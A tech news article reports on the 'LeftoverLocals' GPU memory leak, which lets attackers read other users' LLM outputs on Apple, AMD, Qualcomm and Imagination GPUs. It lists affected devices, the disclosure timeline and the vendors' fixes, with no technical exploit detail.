Apple & AMD GPUs using AI at risk of being spied on in shocking vulnerability
Pexels / Apple / AMDA new vulnerability has exposed that using machine learning or language learning models on Apple, AMD, Qualcomm, and Imagination GPUs could be at risk of having their outputs spied on by attackers.
If CES 2024 is anything to go by, artificial intelligence is all the rage. Ever since the advent of ChatGPT bringing language learning models (LLMs) and machine learning (ML) to the forefront of the industry. Manufacturers like Nvidia have now reached unbelievable levels of value due to the implications of this technological trend. But, a new vulnerability could expose the outputs of millions of devices across the globe.
As seen on the Trail of Bits blog, a vulnerability dubbed “LeftoverLocals” could expose users using LLMs or ML applications via accessing a GPU memory leak. This would allow an attacker to listen to a user’s session, and create a similar output. This could potentially reconstruct an entire response.
The vulnerability was first identified in September 2023, and reported to the CERT coordination center, to bring together manufacturers and make them aware of the issue.
Affected manufacturers
The vulnerability has affected potentially millions of devices using affected chips. Most notably, Apple. The issue was exposed to the company, with devices like the iPad Air 3 and M2 MacBook Air among the list of affected devices. However, systems using newer chips such as the iPhone 15, any device using an A17 chip, and the M3 chip contain fixes.
AMD GPUs across their entire product stack are affected. However, the company plans to mitigate the issue with upcoming driver updates beginning in March 2024.
Some Qualcomm devices are also affected, but the company has confirmed that it is working on a fix: “We encourage end users to apply security updates as they become available from their device makers.”
Google has also confirmed that Imagination GPUs are also affected, but the company issued a fix for customers in December 2023.
Nvidia and ARM devices remain unaffected by the vulnerability, however.
Considering the sheer number of devices affected, this GPU listening vulnerability highlights how machine learning applications have not undergone the same rigorous security testing as many other applications. In a fast-evolving software field, creating the perfect breeding ground for vulnerabilities like this when using applications like Stable Diffusion.